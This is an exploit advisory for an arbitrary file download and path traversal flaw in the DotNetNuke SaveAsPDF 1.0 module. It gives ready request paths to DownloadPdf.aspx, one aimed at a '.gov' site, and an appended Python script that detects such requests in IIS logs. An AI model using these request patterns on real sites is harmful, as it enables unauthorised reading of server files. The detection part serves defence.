DotNetNuke SaveAsPDF 1.0 Arbitrary File Download

DotNetNuke SaveAsPDF module version 1.0 suffers from an arbitrary file download vulnerability.


MD5 | 4874d6c163e0bb30017d6b7221e9448c

####################################################################

# Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/03/2019
# Vendor Homepage : bizmodules.net ~ dnnsoftware.com
# Software Information Links :
bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
bizmodules.net/portals/0/downloads/sap.pdf
# Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
texts, pictures and even flash contents.

####################################################################

# Impact :
***********
* DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the
web server process and obtain potentially sensitive information. The same issue also
works as an open redirection vulnerability.

* An information exposure is the intentional or unintentional disclosure of information to an actor
that is not explicitly authorized to have access to that information.

* The software uses external input to construct a pathname that should be within a
restricted directory, but it does not properly neutralize sequences such as ".." that
can resolve to a location that is outside of that directory.

####################################################################

# Arbitrary File Download Exploit :
*******************************
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov

/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]

/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]

Note : The module converts any arbitrary website to a PDF file and downloads it to your
computer, and it also downloads system files from the DNNSoftware installation.
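
Detection sketch for the request patterns above, added here as an example and not part of the original advisory: it scans a W3C extended (IIS) access log for DownloadPdf.aspx requests whose url/file parameter carries a ".." segment, an absolute path or an external URL. The log lines, client addresses and finding labels are constructed for illustration; the field layout is assumed to follow the #Fields header.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter names come from the advisory; IIS paths are case-insensitive.
ENDPOINT = "/desktopmodules/saveaspdf/downloadpdf.aspx"
WATCHED = {"url", "file"}
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")    # a ".." path segment
ABSOLUTE = re.compile(r"^([A-Za-z]:[\\/]|[\\/])")    # drive-letter or rooted path
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")  # http://, file://, ...
# Constructed sample log (documentation IP ranges, placeholder file names).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2019-03-12 10:00:01 192.0.2.10 GET /Default.aspx tabid=188 200
2019-03-12 10:00:05 192.0.2.11 GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx Name=1&Url=report.pdf 200
2019-03-12 10:00:09 198.51.100.7 GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx Name=1&file=..%2F..%2Fexample.txt 200
2019-03-12 10:00:12 198.51.100.7 GET /desktopmodules/saveaspdf/downloadpdf.aspx url=https://example.org 200
2019-03-12 10:00:15 198.51.100.7 GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx Name=1&Url=%252e%252e%5Cexample.txt 200
"""

def classify(request_target):
    """Return sorted findings for one request target (path plus query)."""
    parts = urlsplit(request_target)
    if parts.path.lower() != ENDPOINT:
        return []
    findings = set()
    # parse_qsl decodes once; the extra unquote catches double encoding (%252e).
    values = [unquote(v) for k, v in parse_qsl(parts.query) if k.lower() in WATCHED]
    for value in values:
        if TRAVERSAL.search(value):
            findings.add("traversal")
        if SCHEME.match(value):
            findings.add("external-url")
        elif ABSOLUTE.match(value):
            findings.add("absolute-path")
    return sorted(findings)

def scan(log_text):
    """Return (client_ip, findings) for each flagged line of a W3C log."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            query = row.get("cs-uri-query", "-")
            target = row.get("cs-uri-stem", "") + ("" if query == "-" else "?" + query)
            if findings := classify(target):
                hits.append((row.get("c-ip"), findings))
    return hits
```

scan(SAMPLE_LOG) flags the last three sample lines and leaves the plain Url=report.pdf request alone, since a bare file name is what the module would see in normal use.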

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
